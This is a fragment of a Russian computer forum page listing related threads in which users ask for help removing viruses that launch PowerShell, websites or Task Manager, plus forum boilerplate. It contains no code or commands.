37091 / 29110 / 5898
Регистрация: 17.06.2006
Сообщений: 43,301
09.02.2020, 14:38

Заказываю контрольные, курсовые, дипломные и любые другие студенческие работы здесь.

Вирус с PowerShell
Всем здравствуйте, есть такая проблем связанная с powershell, пользуясь пк у меня примерно 2-3 раза...

Вирус запускает сайт !
Здравствуйте, обращаюсь к вам уже 2 раз. И так на ПК у меня запускается сайт под названием...

Вирус запускает ПО, запускается Taskmgr.exe
Добрый день. Помогите пожалуйста с очисткой ПК от вирусов. Самостоятельно устанавливается ПО,...

Вирус запускает программы и открывает сайты
Здравствуйте. Прошу помочь. Всё, что смог, я удалил: все программы и файлы через unlocker и...


Искать еще темы с ответами

Или воспользуйтесь поиском по форуму:
7
Ответ Создать тему
Опции темы

КиберФорум - форум программистов, компьютерный форум, программирование
Powered by vBulletin® Version 3.8.9
Copyright ©2000 - 2020, vBulletin Solutions, Inc.